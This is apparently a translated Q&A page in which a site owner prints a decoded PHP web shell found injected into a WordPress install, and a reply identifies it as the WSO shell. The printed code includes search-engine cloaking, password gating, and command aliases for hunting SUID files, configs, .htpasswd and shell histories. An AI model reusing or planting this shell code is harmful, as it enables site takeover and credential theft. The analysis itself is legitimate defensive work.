



它是从注入到wordpress目录中的PHP文件提取的。 经过几次base64和解压缩后,我能够得到这个信息:

<?PHP ?><?PHP
/* Reject search engines */
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array('Google','Slurp','MSNBot','ia_archiver','Yandex','Rambler');
    if (preg_match('/' . implode('|',$userAgents) . '/i',$_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
/* Settings */
$color = '#12ff4f';
$default_charset = 'Windows-1251';
/* Shell Setup */
/*More Shell SetuP*/
if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
if (get_magic_quotes_gpc()) {
    function WSOstripslashes($arr) {
        return is_array($arr) ? array_map('WSOstripslashes',$arr) : stripslashes($arr);
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
function WSOb64decode($arr) {
    return is_array($arr) ? array_map('WSOb64decode',$arr) : base64_decode($arr);
function WSOsetcookie($k,$v) {
    $_COOKIE[$k] = $v;
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']),base64_encode($_POST['pass']));
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
$_POST = WSOb64decode($_POST);
$os = (strtolower(substr(PHP_OS,3)) == 'win') ? 'win' : 'nix';
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
$aliases = array('List dir' => 'ls -lha','list file attributes on a Linux second extended file system' => 'lsattr -va','show opened ports' => 'netstat -an | grep -i listen','process status' => 'ps aux','Find' => '','find suid' => 'find / -type f -perm -04000 -ls','find suid in current dir' => 'find . -type f -perm -04000 -ls','find sgid' => 'find / -type f -perm -02000 -ls','find sgid files in current dir' => 'find . -type f -perm -02000 -ls','find config.inc.PHP' => 'find / -type f -name config.inc.PHP','find config*' => 'find / -type f -name "config*"','find config* in current dir' => 'find . -type f -name "config*"','find writable folders and files' => 'find / -perm -2 -ls','find writable folders and files in current dir' => 'find . -perm -2 -ls','find service.pwd' => 'find / -type f -name service.pwd','find service.pwd files in current dir' => 'find . -type f -name service.pwd','find .htpasswd' => 'find / -type f -name .htpasswd','find .htpasswd files in current dir' => 'find . -type f -name .htpasswd','find .bash_history' => 'find / -type f -name .bash_history','find .bash_history files in current dir' => 'find . -type f -name .bash_history','find .fetchmailrc' => 'find / -type f -name .fetchmailrc','find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc','Locate' => '','locate httpd.conf' => 'locate httpd.conf','locate vhosts.conf' => 'locate vhosts.conf','locate proftpd.conf' => 'locate proftpd.conf','locate psybnc.conf' => 'locate psybnc.conf','locate my.conf' => 'locate my.conf','locate admin.PHP' => 'locate admin.PHP','locate cfg.PHP' => 'locate cfg.PHP','locate conf.PHP' => 'locate conf.PHP','locate config.dat' => 'locate config.dat','locate config.PHP' => 'locate config.PHP','locate config.inc' => 'locate config.inc','locate config.inc.PHP' => 'locate config.inc.PHP','locate config.default.PHP' => 'locate config.default.PHP','locate config*' => 'locate config','locate .conf' => 'locate ".conf"','locate .pwd' => 'locate ".pwd"','locate .sql' => 'locate ".sql"','locate .htpasswd' => 'locate ".htpasswd"','locate .bash_history' => 'locate ".bash_history"','locate .MysqL_history' => 'locate ".MysqL_history"','locate .fetchmailrc' => 'locate ".fetchmailrc"','locate backup' => 'locate backup','locate dump' => 'locate dump','locate priv' => 'locate priv');
if ($os == 'win') {
    $home_cwd = str_replace('\',' / ',$home_cwd);$cwd=str_replace('\',$cwd);$aliases=array('ListDirectory'=>'dir','Findindex . PHPincurrentdir'=>'dir / s / w / bindex . PHP','Find * config * . PHPincurrentdir'=>'dir / s / w / b * config * . PHP','Showactiveconnections'=>'netstat - an','Showrunningservices'=>'netstart','Useraccounts'=>'netuser','Showcomputers'=>'netview','ARPTable'=>'arp - a','IPConfiguration'=>'ipconfig / all');}
if($cwd[strlen($cwd)-1]!=' / ')$cwd.=' / ';
if(!function_exists('posix_getpwuid')&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}
if(!function_exists('posix_getgrgid')&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}

... [full code in pastebin]                                                            

Full Code Pastebin

感谢您的理解! 谢谢



您共享的代码对于漏洞利用来说非常容易读取!通常,利用有效载荷会被编码或“模糊化”,从而使它们几乎不可读,并且使病毒检测软件难以检测其特征。但是,您不必逐行遵循它即可看到它设置了HTML Web表单并允许执行某些文件和目录命令。这里的有效负载似乎是一个Web Shell(这是一种常见的有效负载)-即HTML驱动的应用程序,攻击者可以通过该应用程序导航您的文件系统。它似乎是WSO Webshell


I was once offered $5k/month to hack WordPress sites,因为(那个家伙声称),接管网站使他能够从这些网站收取广告收入。显然,这是一项有利可图的业务。


版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。